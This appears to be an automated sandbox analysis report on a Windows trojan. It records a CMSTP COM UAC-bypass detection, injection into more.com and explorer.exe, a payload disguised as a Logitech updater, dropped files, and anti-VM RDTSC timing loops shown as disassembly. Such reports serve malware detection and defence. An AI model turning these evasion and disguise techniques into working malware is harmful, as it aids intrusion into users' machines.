Source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@13/7@3/1

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,

14_2_0076E8D0

Source: C:\Windows\SysWOW64\more.com

File created: C:\Users\user\AppData\Roaming\LogiOptionsPlus

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

File created: C:\Users\user\AppData\Local\Temp\9c813d63

Jump to behavior

Source: Yara match	File source: 5Z1WFRMTOXRH6X21Z8NU8.exe, type: SAMPLE
Source: Yara match	File source: 0.0.5Z1WFRMTOXRH6X21Z8NU8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1730888199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2156540910.000000000394F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

ReversingLabs: Detection: 18%

Source: explorer.exe	String found in binary or memory: " /add
Source: explorer.exe	String found in binary or memory: " /add /y
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: %%DebenuPDFLibrary-Start
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: SetLicenseKeyErrorPDW32.dll is not found. Please re-install program as administrator.S
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: EActiveX DLL is not found. Please re-install program as administrator.U
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: :The help file is not found. Please re-install the program.
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: document-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: document-text-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: file-image-add-2_large@1x
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	String found in binary or memory: folder-add-2_large@1x

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

File read: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe "C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe"
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe "C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe"
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: fontsub.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: fontsub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: fontsub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior

Source: C:\Windows\SysWOW64\more.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static file information: File size 11391336 > 1048576

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5d0a00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x470e00

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: More than 200 imports for user32.dll

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source:	Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source:	Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp

PE file contains sections with non-standard names

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe	Static PE information: section name: .didata
Source: cnfpnteryde.1.dr	Static PE information: section name: dld
Source: vkqcbyjdfiw.12.dr	Static PE information: section name: dld

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00789FB1 push ecx; ret

14_2_00789FC4

Drops PE files

Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw			Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\cnfpnteryde			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\cnfpnteryde			Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	File created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\more.com	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CNFPNTERYDE
Source: C:\Windows\SysWOW64\more.com	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VKQCBYJDFIW

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	API/Special instruction interceptor: Address: 75DA7C44
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	API/Special instruction interceptor: Address: 75DA7945
Source: C:\Windows\SysWOW64\more.com	API/Special instruction interceptor: Address: 75DA3B54
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	API/Special instruction interceptor: Address: 75DA7C44
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: B0A317
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	API/Special instruction interceptor: Address: 75DA7945

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	RDTSC instruction interceptor: First address: 75DAF3E1 second address: 75DAF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	RDTSC instruction interceptor: First address: 75DAF3FD second address: 75DAF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F8C64C6CA05h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F8C64C6CA90h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	RDTSC instruction interceptor: First address: 75DAF3E1 second address: 75DAF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	RDTSC instruction interceptor: First address: 75DAF3FD second address: 75DAF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F8C64C6CA05h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F8C64C6CA90h 0x00000031 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007D8A00 rdtsc

14_2_007D8A00

Contains long sleeps (>= 3 min)

